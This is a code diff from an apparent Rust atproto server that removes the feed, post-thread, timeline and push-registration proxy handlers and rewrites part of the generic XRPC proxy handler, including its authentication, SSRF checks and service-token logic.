··· 1 - use crate::api::ApiError; 2 - use crate::api::proxy_client::{ 3 - MAX_RESPONSE_SIZE, is_ssrf_safe, proxy_client, validate_at_uri, validate_limit, 4 - }; 5 - use crate::state::AppState; 6 - use axum::{ 7 - extract::{Query, State}, 8 - http::StatusCode, 9 - response::{IntoResponse, Response}, 10 - }; 11 - use serde::Deserialize; 12 - use std::collections::HashMap; 13 - use tracing::{error, info}; 14 - 15 - #[derive(Deserialize)] 16 - pub struct GetFeedParams { 17 - pub feed: String, 18 - pub limit: Option<u32>, 19 - pub cursor: Option<String>, 20 - } 21 - 22 - pub async fn get_feed( 23 - State(state): State<AppState>, 24 - headers: axum::http::HeaderMap, 25 - Query(params): Query<GetFeedParams>, 26 - ) -> Response { 27 - let token = match crate::auth::extract_bearer_token_from_header( 28 - headers.get("Authorization").and_then(|h| h.to_str().ok()), 29 - ) { 30 - Some(t) => t, 31 - None => return ApiError::AuthenticationRequired.into_response(), 32 - }; 33 - let auth_user = match crate::auth::validate_bearer_token(&state.db, &token).await { 34 - Ok(user) => user, 35 - Err(e) => return ApiError::from(e).into_response(), 36 - }; 37 - if let Err(e) = validate_at_uri(&params.feed) { 38 - return ApiError::InvalidRequest(format!("Invalid feed URI: {}", e)).into_response(); 39 - } 40 - let resolved = match state.appview_registry.get_appview_for_method("app.bsky.feed.getFeed").await { 41 - Some(r) => r, 42 - None => { 43 - return ApiError::UpstreamUnavailable("No upstream AppView configured for app.bsky.feed.getFeed".to_string()) 44 - .into_response(); 45 - } 46 - }; 47 - if let Err(e) = is_ssrf_safe(&resolved.url) { 48 - error!("SSRF check failed for appview URL: {}", e); 49 - return ApiError::UpstreamUnavailable(format!("Invalid upstream URL: {}", e)) 50 - .into_response(); 51 - } 52 - let limit = validate_limit(params.limit, 50, 100); 53 - let mut query_params = HashMap::new(); 54 - query_params.insert("feed".to_string(), params.feed.clone()); 55 - query_params.insert("limit".to_string(), limit.to_string()); 56 - if let Some(cursor) = &params.cursor { 57 - query_params.insert("cursor".to_string(), cursor.clone()); 58 - } 59 - let target_url = format!("{}/xrpc/app.bsky.feed.getFeed", resolved.url); 60 - info!(target = %target_url, feed = %params.feed, "Proxying getFeed request"); 61 - let client = proxy_client(); 62 - let mut request_builder = client.get(&target_url).query(&query_params); 63 - if let Some(key_bytes) = auth_user.key_bytes.as_ref() { 64 - match crate::auth::create_service_token( 65 - &auth_user.did, 66 - &resolved.did, 67 - "app.bsky.feed.getFeed", 68 - key_bytes, 69 - ) { 70 - Ok(service_token) => { 71 - request_builder = 72 - request_builder.header("Authorization", format!("Bearer {}", service_token)); 73 - } 74 - Err(e) => { 75 - error!(error = ?e, "Failed to create service token for getFeed"); 76 - return ApiError::InternalError.into_response(); 77 - } 78 - } 79 - } 80 - match request_builder.send().await { 81 - Ok(resp) => { 82 - let status = 83 - StatusCode::from_u16(resp.status().as_u16()).unwrap_or(StatusCode::BAD_GATEWAY); 84 - let content_length = resp.content_length().unwrap_or(0); 85 - if content_length > MAX_RESPONSE_SIZE { 86 - error!( 87 - content_length, 88 - max = MAX_RESPONSE_SIZE, 89 - "getFeed response too large" 90 - ); 91 - return ApiError::UpstreamFailure.into_response(); 92 - } 93 - let resp_headers = resp.headers().clone(); 94 - let body = match resp.bytes().await { 95 - Ok(b) => { 96 - if b.len() as u64 > MAX_RESPONSE_SIZE { 97 - error!(len = b.len(), "getFeed response body exceeded limit"); 98 - return ApiError::UpstreamFailure.into_response(); 99 - } 100 - b 101 - } 102 - Err(e) => { 103 - error!(error = ?e, "Error reading getFeed response"); 104 - return ApiError::UpstreamFailure.into_response(); 105 - } 106 - }; 107 - let mut response_builder = axum::response::Response::builder().status(status); 108 - if let Some(ct) = resp_headers.get("content-type") { 109 - response_builder = response_builder.header("content-type", ct); 110 - } 111 - match response_builder.body(axum::body::Body::from(body)) { 112 - Ok(r) => r, 113 - Err(e) => { 114 - error!(error = ?e, "Error building getFeed response"); 115 - ApiError::UpstreamFailure.into_response() 116 - } 117 - } 118 - } 119 - Err(e) => { 120 - error!(error = ?e, "Error proxying getFeed"); 121 - if e.is_timeout() { 122 - ApiError::UpstreamTimeout.into_response() 123 - } else if e.is_connect() { 124 - ApiError::UpstreamUnavailable("Failed to connect to upstream".to_string()) 125 - .into_response() 126 - } else { 127 - ApiError::UpstreamFailure.into_response() 128 - } 129 - } 130 - } 131 - }
···
-11
src/api/feed/mod.rs
··· 1 - mod actor_likes; 2 - mod author_feed; 3 - mod custom_feed; 4 - mod post_thread; 5 - mod timeline; 6 - 7 - pub use actor_likes::get_actor_likes; 8 - pub use author_feed::get_author_feed; 9 - pub use custom_feed::get_feed; 10 - pub use post_thread::get_post_thread; 11 - pub use timeline::get_timeline;
···
-315
src/api/feed/post_thread.rs
··· 1 - use crate::api::read_after_write::{ 2 - PostRecord, PostView, RecordDescript, extract_repo_rev, format_local_post, 3 - format_munged_response, get_local_lag, get_records_since_rev, proxy_to_appview_via_registry, 4 - }; 5 - use crate::state::AppState; 6 - use axum::{ 7 - Json, 8 - extract::{Query, State}, 9 - http::StatusCode, 10 - response::{IntoResponse, Response}, 11 - }; 12 - use serde::{Deserialize, Serialize}; 13 - use serde_json::{Value, json}; 14 - use std::collections::HashMap; 15 - use tracing::warn; 16 - 17 - #[derive(Deserialize)] 18 - pub struct GetPostThreadParams { 19 - pub uri: String, 20 - pub depth: Option<u32>, 21 - #[serde(rename = "parentHeight")] 22 - pub parent_height: Option<u32>, 23 - } 24 - 25 - #[derive(Debug, Clone, Serialize, Deserialize)] 26 - #[serde(rename_all = "camelCase")] 27 - pub struct ThreadViewPost { 28 - #[serde(rename = "$type")] 29 - pub thread_type: Option<String>, 30 - pub post: PostView, 31 - #[serde(skip_serializing_if = "Option::is_none")] 32 - pub parent: Option<Box<ThreadNode>>, 33 - #[serde(skip_serializing_if = "Option::is_none")] 34 - pub replies: Option<Vec<ThreadNode>>, 35 - #[serde(flatten)] 36 - pub extra: HashMap<String, Value>, 37 - } 38 - 39 - #[derive(Debug, Clone, Serialize, Deserialize)] 40 - #[serde(untagged)] 41 - pub enum ThreadNode { 42 - Post(Box<ThreadViewPost>), 43 - NotFound(ThreadNotFound), 44 - Blocked(ThreadBlocked), 45 - } 46 - 47 - #[derive(Debug, Clone, Serialize, Deserialize)] 48 - #[serde(rename_all = "camelCase")] 49 - pub struct ThreadNotFound { 50 - #[serde(rename = "$type")] 51 - pub thread_type: String, 52 - pub uri: String, 53 - pub not_found: bool, 54 - } 55 - 56 - #[derive(Debug, Clone, Serialize, Deserialize)] 57 - #[serde(rename_all = "camelCase")] 58 - pub struct ThreadBlocked { 59 - #[serde(rename = "$type")] 60 - pub thread_type: String, 61 - pub uri: String, 62 - pub blocked: bool, 63 - pub author: Value, 64 - } 65 - 66 - #[derive(Debug, Clone, Serialize, Deserialize)] 67 - pub struct PostThreadOutput { 68 - pub thread: ThreadNode, 69 - #[serde(skip_serializing_if = "Option::is_none")] 70 - pub threadgate: Option<Value>, 71 - } 72 - 73 - const MAX_THREAD_DEPTH: usize = 10; 74 - 75 - fn add_replies_to_thread( 76 - thread: &mut ThreadViewPost, 77 - local_posts: &[RecordDescript<PostRecord>], 78 - author_did: &str, 79 - author_handle: &str, 80 - depth: usize, 81 - ) { 82 - if depth >= MAX_THREAD_DEPTH { 83 - return; 84 - } 85 - let thread_uri = &thread.post.uri; 86 - let replies: Vec<_> = local_posts 87 - .iter() 88 - .filter(|p| { 89 - p.record 90 - .reply 91 - .as_ref() 92 - .and_then(|r| r.get("parent")) 93 - .and_then(|parent| parent.get("uri")) 94 - .and_then(|u| u.as_str()) 95 - == Some(thread_uri) 96 - }) 97 - .map(|p| { 98 - let post_view = format_local_post(p, author_did, author_handle, None); 99 - ThreadNode::Post(Box::new(ThreadViewPost { 100 - thread_type: Some("app.bsky.feed.defs#threadViewPost".to_string()), 101 - post: post_view, 102 - parent: None, 103 - replies: None, 104 - extra: HashMap::new(), 105 - })) 106 - }) 107 - .collect(); 108 - if !replies.is_empty() { 109 - match &mut thread.replies { 110 - Some(existing) => existing.extend(replies), 111 - None => thread.replies = Some(replies), 112 - } 113 - } 114 - if let Some(ref mut existing_replies) = thread.replies { 115 - for reply in existing_replies.iter_mut() { 116 - if let ThreadNode::Post(reply_thread) = reply { 117 - add_replies_to_thread( 118 - reply_thread, 119 - local_posts, 120 - author_did, 121 - author_handle, 122 - depth + 1, 123 - ); 124 - } 125 - } 126 - } 127 - } 128 - 129 - pub async fn get_post_thread( 130 - State(state): State<AppState>, 131 - headers: axum::http::HeaderMap, 132 - Query(params): Query<GetPostThreadParams>, 133 - ) -> Response { 134 - let auth_header = headers.get("Authorization").and_then(|h| h.to_str().ok()); 135 - let auth_user = if let Some(h) = auth_header { 136 - if let Some(token) = crate::auth::extract_bearer_token_from_header(Some(h)) { 137 - crate::auth::validate_bearer_token(&state.db, &token) 138 - .await 139 - .ok() 140 - } else { 141 - None 142 - } 143 - } else { 144 - None 145 - }; 146 - let auth_did = auth_user.as_ref().map(|u| u.did.clone()); 147 - let auth_key_bytes = auth_user.as_ref().and_then(|u| u.key_bytes.clone()); 148 - let mut query_params = HashMap::new(); 149 - query_params.insert("uri".to_string(), params.uri.clone()); 150 - if let Some(depth) = params.depth { 151 - query_params.insert("depth".to_string(), depth.to_string()); 152 - } 153 - if let Some(parent_height) = params.parent_height { 154 - query_params.insert("parentHeight".to_string(), parent_height.to_string()); 155 - } 156 - let proxy_result = match proxy_to_appview_via_registry( 157 - &state, 158 - "app.bsky.feed.getPostThread", 159 - &query_params, 160 - auth_did.as_deref().unwrap_or(""), 161 - auth_key_bytes.as_deref(), 162 - ) 163 - .await 164 - { 165 - Ok(r) => r, 166 - Err(e) => return e, 167 - }; 168 - if proxy_result.status == StatusCode::NOT_FOUND { 169 - return handle_not_found(&state, &params.uri, auth_did, &proxy_result.headers).await; 170 - } 171 - if !proxy_result.status.is_success() { 172 - return proxy_result.into_response(); 173 - } 174 - let rev = match extract_repo_rev(&proxy_result.headers) { 175 - Some(r) => r, 176 - None => return proxy_result.into_response(), 177 - }; 178 - let mut thread_output: PostThreadOutput = match serde_json::from_slice(&proxy_result.body) { 179 - Ok(t) => t, 180 - Err(e) => { 181 - warn!("Failed to parse post thread response: {:?}", e); 182 - return proxy_result.into_response(); 183 - } 184 - }; 185 - let requester_did = match auth_did { 186 - Some(d) => d, 187 - None => return (StatusCode::OK, Json(thread_output)).into_response(), 188 - }; 189 - let local_records = match get_records_since_rev(&state, &requester_did, &rev).await { 190 - Ok(r) => r, 191 - Err(e) => { 192 - warn!("Failed to get local records: {}", e); 193 - return proxy_result.into_response(); 194 - } 195 - }; 196 - if local_records.posts.is_empty() { 197 - return (StatusCode::OK, Json(thread_output)).into_response(); 198 - } 199 - let handle = match sqlx::query_scalar!("SELECT handle FROM users WHERE did = $1", requester_did) 200 - .fetch_optional(&state.db) 201 - .await 202 - { 203 - Ok(Some(h)) => h, 204 - Ok(None) => requester_did.clone(), 205 - Err(e) => { 206 - warn!("Database error fetching handle: {:?}", e); 207 - requester_did.clone() 208 - } 209 - }; 210 - if let ThreadNode::Post(ref mut thread_post) = thread_output.thread { 211 - add_replies_to_thread( 212 - thread_post, 213 - &local_records.posts, 214 - &requester_did, 215 - &handle, 216 - 0, 217 - ); 218 - } 219 - let lag = get_local_lag(&local_records); 220 - format_munged_response(thread_output, lag) 221 - } 222 - 223 - async fn handle_not_found( 224 - state: &AppState, 225 - uri: &str, 226 - auth_did: Option<String>, 227 - headers: &axum::http::HeaderMap, 228 - ) -> Response { 229 - let rev = match extract_repo_rev(headers) { 230 - Some(r) => r, 231 - None => { 232 - return ( 233 - StatusCode::NOT_FOUND, 234 - Json(json!({"error": "NotFound", "message": "Post not found"})), 235 - ) 236 - .into_response(); 237 - } 238 - }; 239 - let requester_did = match auth_did { 240 - Some(d) => d, 241 - None => { 242 - return ( 243 - StatusCode::NOT_FOUND, 244 - Json(json!({"error": "NotFound", "message": "Post not found"})), 245 - ) 246 - .into_response(); 247 - } 248 - }; 249 - let uri_parts: Vec<&str> = uri.trim_start_matches("at://").split('/').collect(); 250 - if uri_parts.len() != 3 { 251 - return ( 252 - StatusCode::NOT_FOUND, 253 - Json(json!({"error": "NotFound", "message": "Post not found"})), 254 - ) 255 - .into_response(); 256 - } 257 - let post_did = uri_parts[0]; 258 - if post_did != requester_did { 259 - return ( 260 - StatusCode::NOT_FOUND, 261 - Json(json!({"error": "NotFound", "message": "Post not found"})), 262 - ) 263 - .into_response(); 264 - } 265 - let local_records = match get_records_since_rev(state, &requester_did, &rev).await { 266 - Ok(r) => r, 267 - Err(_) => { 268 - return ( 269 - StatusCode::NOT_FOUND, 270 - Json(json!({"error": "NotFound", "message": "Post not found"})), 271 - ) 272 - .into_response(); 273 - } 274 - }; 275 - let local_post = local_records.posts.iter().find(|p| p.uri == uri); 276 - let local_post = match local_post { 277 - Some(p) => p, 278 - None => { 279 - return ( 280 - StatusCode::NOT_FOUND, 281 - Json(json!({"error": "NotFound", "message": "Post not found"})), 282 - ) 283 - .into_response(); 284 - } 285 - }; 286 - let handle = match sqlx::query_scalar!("SELECT handle FROM users WHERE did = $1", requester_did) 287 - .fetch_optional(&state.db) 288 - .await 289 - { 290 - Ok(Some(h)) => h, 291 - Ok(None) => requester_did.clone(), 292 - Err(e) => { 293 - warn!("Database error fetching handle: {:?}", e); 294 - requester_did.clone() 295 - } 296 - }; 297 - let post_view = format_local_post( 298 - local_post, 299 - &requester_did, 300 - &handle, 301 - local_records.profile.as_ref(), 302 - ); 303 - let thread = PostThreadOutput { 304 - thread: ThreadNode::Post(Box::new(ThreadViewPost { 305 - thread_type: Some("app.bsky.feed.defs#threadViewPost".to_string()), 306 - post: post_view, 307 - parent: None, 308 - replies: None, 309 - extra: HashMap::new(), 310 - })), 311 - threadgate: None, 312 - }; 313 - let lag = get_local_lag(&local_records); 314 - format_munged_response(thread, lag) 315 - }
···
-275
src/api/feed/timeline.rs
··· 1 - use crate::api::read_after_write::{ 2 - FeedOutput, FeedViewPost, PostView, extract_repo_rev, format_local_post, 3 - format_munged_response, get_local_lag, get_records_since_rev, insert_posts_into_feed, 4 - proxy_to_appview_via_registry, 5 - }; 6 - use crate::state::AppState; 7 - use axum::{ 8 - Json, 9 - extract::{Query, State}, 10 - http::StatusCode, 11 - response::{IntoResponse, Response}, 12 - }; 13 - use jacquard_repo::storage::BlockStore; 14 - use serde::Deserialize; 15 - use serde_json::{Value, json}; 16 - use std::collections::HashMap; 17 - use tracing::warn; 18 - 19 - #[derive(Deserialize)] 20 - pub struct GetTimelineParams { 21 - pub algorithm: Option<String>, 22 - pub limit: Option<u32>, 23 - pub cursor: Option<String>, 24 - } 25 - 26 - pub async fn get_timeline( 27 - State(state): State<AppState>, 28 - headers: axum::http::HeaderMap, 29 - Query(params): Query<GetTimelineParams>, 30 - ) -> Response { 31 - let token = match crate::auth::extract_bearer_token_from_header( 32 - headers.get("Authorization").and_then(|h| h.to_str().ok()), 33 - ) { 34 - Some(t) => t, 35 - None => { 36 - return ( 37 - StatusCode::UNAUTHORIZED, 38 - Json(json!({"error": "AuthenticationRequired"})), 39 - ) 40 - .into_response(); 41 - } 42 - }; 43 - let auth_user = match crate::auth::validate_bearer_token(&state.db, &token).await { 44 - Ok(user) => user, 45 - Err(_) => { 46 - return ( 47 - StatusCode::UNAUTHORIZED, 48 - Json(json!({"error": "AuthenticationFailed"})), 49 - ) 50 - .into_response(); 51 - } 52 - }; 53 - if state.appview_registry.get_appview_for_method("app.bsky.feed.getTimeline").await.is_some() { 54 - return get_timeline_with_appview( 55 - &state, 56 - &params, 57 - &auth_user.did, 58 - auth_user.key_bytes.as_deref(), 59 - ) 60 - .await; 61 - } 62 - get_timeline_local_only(&state, &auth_user.did).await 63 - } 64 - 65 - async fn get_timeline_with_appview( 66 - state: &AppState, 67 - params: &GetTimelineParams, 68 - auth_did: &str, 69 - auth_key_bytes: Option<&[u8]>, 70 - ) -> Response { 71 - let mut query_params = HashMap::new(); 72 - if let Some(algo) = &params.algorithm { 73 - query_params.insert("algorithm".to_string(), algo.clone()); 74 - } 75 - if let Some(limit) = params.limit { 76 - query_params.insert("limit".to_string(), limit.to_string()); 77 - } 78 - if let Some(cursor) = &params.cursor { 79 - query_params.insert("cursor".to_string(), cursor.clone()); 80 - } 81 - let proxy_result = match proxy_to_appview_via_registry( 82 - state, 83 - "app.bsky.feed.getTimeline", 84 - &query_params, 85 - auth_did, 86 - auth_key_bytes, 87 - ) 88 - .await 89 - { 90 - Ok(r) => r, 91 - Err(e) => return e, 92 - }; 93 - if !proxy_result.status.is_success() { 94 - return proxy_result.into_response(); 95 - } 96 - let rev = extract_repo_rev(&proxy_result.headers); 97 - if rev.is_none() { 98 - return proxy_result.into_response(); 99 - } 100 - let rev = rev.unwrap(); 101 - let mut feed_output: FeedOutput = match serde_json::from_slice(&proxy_result.body) { 102 - Ok(f) => f, 103 - Err(e) => { 104 - warn!("Failed to parse timeline response: {:?}", e); 105 - return proxy_result.into_response(); 106 - } 107 - }; 108 - let local_records = match get_records_since_rev(state, auth_did, &rev).await { 109 - Ok(r) => r, 110 - Err(e) => { 111 - warn!("Failed to get local records: {}", e); 112 - return proxy_result.into_response(); 113 - } 114 - }; 115 - if local_records.count == 0 { 116 - return proxy_result.into_response(); 117 - } 118 - let handle = match sqlx::query_scalar!("SELECT handle FROM users WHERE did = $1", auth_did) 119 - .fetch_optional(&state.db) 120 - .await 121 - { 122 - Ok(Some(h)) => h, 123 - Ok(None) => auth_did.to_string(), 124 - Err(e) => { 125 - warn!("Database error fetching handle: {:?}", e); 126 - auth_did.to_string() 127 - } 128 - }; 129 - let local_posts: Vec<_> = local_records 130 - .posts 131 - .iter() 132 - .map(|p| format_local_post(p, auth_did, &handle, local_records.profile.as_ref())) 133 - .collect(); 134 - insert_posts_into_feed(&mut feed_output.feed, local_posts); 135 - let lag = get_local_lag(&local_records); 136 - format_munged_response(feed_output, lag) 137 - } 138 - 139 - async fn get_timeline_local_only(state: &AppState, auth_did: &str) -> Response { 140 - let user_id: uuid::Uuid = 141 - match sqlx::query_scalar!("SELECT id FROM users WHERE did = $1", auth_did) 142 - .fetch_optional(&state.db) 143 - .await 144 - { 145 - Ok(Some(id)) => id, 146 - Ok(None) => { 147 - return ( 148 - StatusCode::INTERNAL_SERVER_ERROR, 149 - Json(json!({"error": "InternalError", "message": "User not found"})), 150 - ) 151 - .into_response(); 152 - } 153 - Err(e) => { 154 - warn!("Database error fetching user: {:?}", e); 155 - return ( 156 - StatusCode::INTERNAL_SERVER_ERROR, 157 - Json(json!({"error": "InternalError", "message": "Database error"})), 158 - ) 159 - .into_response(); 160 - } 161 - }; 162 - let follows_query = sqlx::query!( 163 - "SELECT record_cid FROM records WHERE repo_id = $1 AND collection = 'app.bsky.graph.follow' LIMIT 5000", 164 - user_id 165 - ) 166 - .fetch_all(&state.db) 167 - .await; 168 - let follow_cids: Vec<String> = match follows_query { 169 - Ok(rows) => rows.iter().map(|r| r.record_cid.clone()).collect(), 170 - Err(_) => { 171 - return ( 172 - StatusCode::INTERNAL_SERVER_ERROR, 173 - Json(json!({"error": "InternalError"})), 174 - ) 175 - .into_response(); 176 - } 177 - }; 178 - let mut followed_dids: Vec<String> = Vec::new(); 179 - for cid_str in follow_cids { 180 - let cid = match cid_str.parse::<cid::Cid>() { 181 - Ok(c) => c, 182 - Err(_) => continue, 183 - }; 184 - let block_bytes = match state.block_store.get(&cid).await { 185 - Ok(Some(b)) => b, 186 - _ => continue, 187 - }; 188 - let record: Value = match serde_ipld_dagcbor::from_slice(&block_bytes) { 189 - Ok(v) => v, 190 - Err(_) => continue, 191 - }; 192 - if let Some(subject) = record.get("subject").and_then(|s| s.as_str()) { 193 - followed_dids.push(subject.to_string()); 194 - } 195 - } 196 - if followed_dids.is_empty() { 197 - return ( 198 - StatusCode::OK, 199 - Json(FeedOutput { 200 - feed: vec![], 201 - cursor: None, 202 - }), 203 - ) 204 - .into_response(); 205 - } 206 - let posts_result = sqlx::query!( 207 - "SELECT r.record_cid, r.rkey, r.created_at, u.did, u.handle 208 - FROM records r 209 - JOIN repos rp ON r.repo_id = rp.user_id 210 - JOIN users u ON rp.user_id = u.id 211 - WHERE u.did = ANY($1) AND r.collection = 'app.bsky.feed.post' 212 - ORDER BY r.created_at DESC 213 - LIMIT 50", 214 - &followed_dids 215 - ) 216 - .fetch_all(&state.db) 217 - .await; 218 - let posts = match posts_result { 219 - Ok(rows) => rows, 220 - Err(_) => { 221 - return ( 222 - StatusCode::INTERNAL_SERVER_ERROR, 223 - Json(json!({"error": "InternalError"})), 224 - ) 225 - .into_response(); 226 - } 227 - }; 228 - let mut feed: Vec<FeedViewPost> = Vec::new(); 229 - for row in posts { 230 - let record_cid: String = row.record_cid; 231 - let rkey: String = row.rkey; 232 - let created_at: chrono::DateTime<chrono::Utc> = row.created_at; 233 - let author_did: String = row.did; 234 - let author_handle: String = row.handle; 235 - let cid = match record_cid.parse::<cid::Cid>() { 236 - Ok(c) => c, 237 - Err(_) => continue, 238 - }; 239 - let block_bytes = match state.block_store.get(&cid).await { 240 - Ok(Some(b)) => b, 241 - _ => continue, 242 - }; 243 - let record: Value = match serde_ipld_dagcbor::from_slice(&block_bytes) { 244 - Ok(v) => v, 245 - Err(_) => continue, 246 - }; 247 - let uri = format!("at://{}/app.bsky.feed.post/{}", author_did, rkey); 248 - feed.push(FeedViewPost { 249 - post: PostView { 250 - uri, 251 - cid: record_cid, 252 - author: crate::api::read_after_write::AuthorView { 253 - did: author_did, 254 - handle: author_handle, 255 - display_name: None, 256 - avatar: None, 257 - extra: HashMap::new(), 258 - }, 259 - record, 260 - indexed_at: created_at.to_rfc3339(), 261 - embed: None, 262 - reply_count: 0, 263 - repost_count: 0, 264 - like_count: 0, 265 - quote_count: 0, 266 - extra: HashMap::new(), 267 - }, 268 - reply: None, 269 - reason: None, 270 - feed_context: None, 271 - extra: HashMap::new(), 272 - }); 273 - } 274 - (StatusCode::OK, Json(FeedOutput { feed, cursor: None })).into_response() 275 - }
···
-3
src/api/mod.rs
··· 1 pub mod actor; 2 pub mod admin; 3 pub mod error; 4 - pub mod feed; 5 pub mod identity; 6 pub mod moderation; 7 - pub mod notification; 8 pub mod notification_prefs; 9 pub mod proxy; 10 pub mod proxy_client; 11 - pub mod read_after_write; 12 pub mod repo; 13 pub mod server; 14 pub mod temp;
··· 1 pub mod actor; 2 pub mod admin; 3 pub mod error; 4 pub mod identity; 5 pub mod moderation; 6 pub mod notification_prefs; 7 pub mod proxy; 8 pub mod proxy_client; 9 pub mod repo; 10 pub mod server; 11 pub mod temp;
-3
src/api/notification/mod.rs
··· 1 - mod register_push; 2 - 3 - pub use register_push::register_push;
···
-153
src/api/notification/register_push.rs
··· 1 - use crate::api::ApiError; 2 - use crate::api::proxy_client::{is_ssrf_safe, proxy_client, validate_did}; 3 - use crate::state::AppState; 4 - use axum::{ 5 - Json, 6 - extract::State, 7 - http::{HeaderMap, StatusCode}, 8 - response::{IntoResponse, Response}, 9 - }; 10 - use serde::Deserialize; 11 - use serde_json::json; 12 - use tracing::{error, info}; 13 - 14 - #[derive(Deserialize)] 15 - #[serde(rename_all = "camelCase")] 16 - pub struct RegisterPushInput { 17 - pub service_did: String, 18 - pub token: String, 19 - pub platform: String, 20 - pub app_id: String, 21 - } 22 - 23 - const VALID_PLATFORMS: &[&str] = &["ios", "android", "web"]; 24 - 25 - pub async fn register_push( 26 - State(state): State<AppState>, 27 - headers: HeaderMap, 28 - Json(input): Json<RegisterPushInput>, 29 - ) -> Response { 30 - let token = match crate::auth::extract_bearer_token_from_header( 31 - headers.get("Authorization").and_then(|h| h.to_str().ok()), 32 - ) { 33 - Some(t) => t, 34 - None => return ApiError::AuthenticationRequired.into_response(), 35 - }; 36 - let auth_user = match crate::auth::validate_bearer_token(&state.db, &token).await { 37 - Ok(user) => user, 38 - Err(e) => return ApiError::from(e).into_response(), 39 - }; 40 - if let Err(e) = validate_did(&input.service_did) { 41 - return ApiError::InvalidRequest(format!("Invalid serviceDid: {}", e)).into_response(); 42 - } 43 - if input.token.is_empty() || input.token.len() > 4096 { 44 - return ApiError::InvalidRequest("Invalid push token".to_string()).into_response(); 45 - } 46 - if !VALID_PLATFORMS.contains(&input.platform.as_str()) { 47 - return ApiError::InvalidRequest(format!( 48 - "Invalid platform. Must be one of: {}", 49 - VALID_PLATFORMS.join(", ") 50 - )) 51 - .into_response(); 52 - } 53 - if input.app_id.is_empty() || input.app_id.len() > 256 { 54 - return ApiError::InvalidRequest("Invalid appId".to_string()).into_response(); 55 - } 56 - let resolved = match state.appview_registry.get_appview_for_method("app.bsky.notification.registerPush").await { 57 - Some(r) => r, 58 - None => { 59 - return ApiError::UpstreamUnavailable("No upstream AppView configured for app.bsky.notification.registerPush".to_string()) 60 - .into_response(); 61 - } 62 - }; 63 - if let Err(e) = is_ssrf_safe(&resolved.url) { 64 - error!("SSRF check failed for appview URL: {}", e); 65 - return ApiError::UpstreamUnavailable(format!("Invalid upstream URL: {}", e)) 66 - .into_response(); 67 - } 68 - let key_row = match sqlx::query!( 69 - "SELECT key_bytes, encryption_version FROM user_keys k JOIN users u ON k.user_id = u.id WHERE u.did = $1", 70 - auth_user.did 71 - ) 72 - .fetch_optional(&state.db) 73 - .await 74 - { 75 - Ok(Some(row)) => row, 76 - Ok(None) => { 77 - error!(did = %auth_user.did, "No signing key found for user"); 78 - return ApiError::InternalError.into_response(); 79 - } 80 - Err(e) => { 81 - error!(error = ?e, "Database error fetching signing key"); 82 - return ApiError::DatabaseError.into_response(); 83 - } 84 - }; 85 - let decrypted_key = 86 - match crate::config::decrypt_key(&key_row.key_bytes, key_row.encryption_version) { 87 - Ok(k) => k, 88 - Err(e) => { 89 - error!(error = ?e, "Failed to decrypt signing key"); 90 - return ApiError::InternalError.into_response(); 91 - } 92 - }; 93 - let service_token = match crate::auth::create_service_token( 94 - &auth_user.did, 95 - &input.service_did, 96 - "app.bsky.notification.registerPush", 97 - &decrypted_key, 98 - ) { 99 - Ok(t) => t, 100 - Err(e) => { 101 - error!(error = ?e, "Failed to create service token"); 102 - return ApiError::InternalError.into_response(); 103 - } 104 - }; 105 - let target_url = format!("{}/xrpc/app.bsky.notification.registerPush", resolved.url); 106 - info!( 107 - target = %target_url, 108 - service_did = %input.service_did, 109 - platform = %input.platform, 110 - "Proxying registerPush request" 111 - ); 112 - let client = proxy_client(); 113 - let request_body = json!({ 114 - "serviceDid": input.service_did, 115 - "token": input.token, 116 - "platform": input.platform, 117 - "appId": input.app_id 118 - }); 119 - match client 120 - .post(&target_url) 121 - .header("Authorization", format!("Bearer {}", service_token)) 122 - .header("Content-Type", "application/json") 123 - .json(&request_body) 124 - .send() 125 - .await 126 - { 127 - Ok(resp) => { 128 - let status = 129 - StatusCode::from_u16(resp.status().as_u16()).unwrap_or(StatusCode::BAD_GATEWAY); 130 - if status.is_success() { 131 - StatusCode::OK.into_response() 132 - } else { 133 - let body = resp.bytes().await.unwrap_or_default(); 134 - error!( 135 - status = %status, 136 - "registerPush upstream error" 137 - ); 138 - ApiError::from_upstream_response(status.as_u16(), &body).into_response() 139 - } 140 - } 141 - Err(e) => { 142 - error!(error = ?e, "Error proxying registerPush"); 143 - if e.is_timeout() { 144 - ApiError::UpstreamTimeout.into_response() 145 - } else if e.is_connect() { 146 - ApiError::UpstreamUnavailable("Failed to connect to upstream".to_string()) 147 - .into_response() 148 - } else { 149 - ApiError::UpstreamFailure.into_response() 150 - } 151 - } 152 - } 153 - }
···
+58 -40
src/api/proxy.rs
··· 1 use crate::api::proxy_client::proxy_client; 2 use crate::state::AppState; 3 use axum::{ 4 body::Bytes, 5 extract::{Path, RawQuery, State}, 6 http::{HeaderMap, Method, StatusCode}, 7 response::{IntoResponse, Response}, 8 }; 9 use tracing::{error, info, warn}; 10 11 pub async fn proxy_handler( ··· 16 RawQuery(query): RawQuery, 17 body: Bytes, 18 ) -> Response { 19 - let proxy_header = headers 20 .get("atproto-proxy") 21 .and_then(|h| h.to_str().ok()) 22 - .map(|s| s.to_string()); 23 - let (appview_url, service_aud) = match &proxy_header { 24 - Some(did_str) => { 25 - let did_without_fragment = did_str.split('#').next().unwrap_or(did_str).to_string(); 26 - match state.appview_registry.resolve_appview_did(&did_without_fragment).await { 27 - Some(resolved) => (resolved.url, Some(resolved.did)), 28 - None => { 29 - error!(did = %did_str, "Could not resolve service DID"); 30 - return (StatusCode::BAD_GATEWAY, "Could not resolve service DID") 31 - .into_response(); 32 - } 33 - } 34 } 35 None => { 36 - match state.appview_registry.get_appview_for_method(&method).await { 37 - Some(resolved) => (resolved.url, Some(resolved.did)), 38 - None => { 39 - return (StatusCode::BAD_GATEWAY, "No upstream AppView configured for this method") 40 - .into_response(); 41 - } 42 - } 43 } 44 }; 45 let target_url = match &query { 46 - Some(q) => format!("{}/xrpc/{}?{}", appview_url, method, q), 47 - None => format!("{}/xrpc/{}", appview_url, method), 48 }; 49 info!("Proxying {} request to {}", method_verb, target_url); 50 let client = proxy_client(); 51 let mut request_builder = client.request(method_verb, &target_url); 52 let mut auth_header_val = headers.get("Authorization").cloned(); 53 - if let Some(aud) = &service_aud { 54 - if let Some(token) = crate::auth::extract_bearer_token_from_header( 55 - headers.get("Authorization").and_then(|h| h.to_str().ok()), 56 - ) { 57 - match crate::auth::validate_bearer_token(&state.db, &token).await { 58 - Ok(auth_user) => { 59 - if let Some(key_bytes) = auth_user.key_bytes { 60 - match crate::auth::create_service_token(&auth_user.did, aud, &method, &key_bytes) { 61 - Ok(new_token) => { 62 - if let Ok(val) = axum::http::HeaderValue::from_str(&format!("Bearer {}", new_token)) { 63 - auth_header_val = 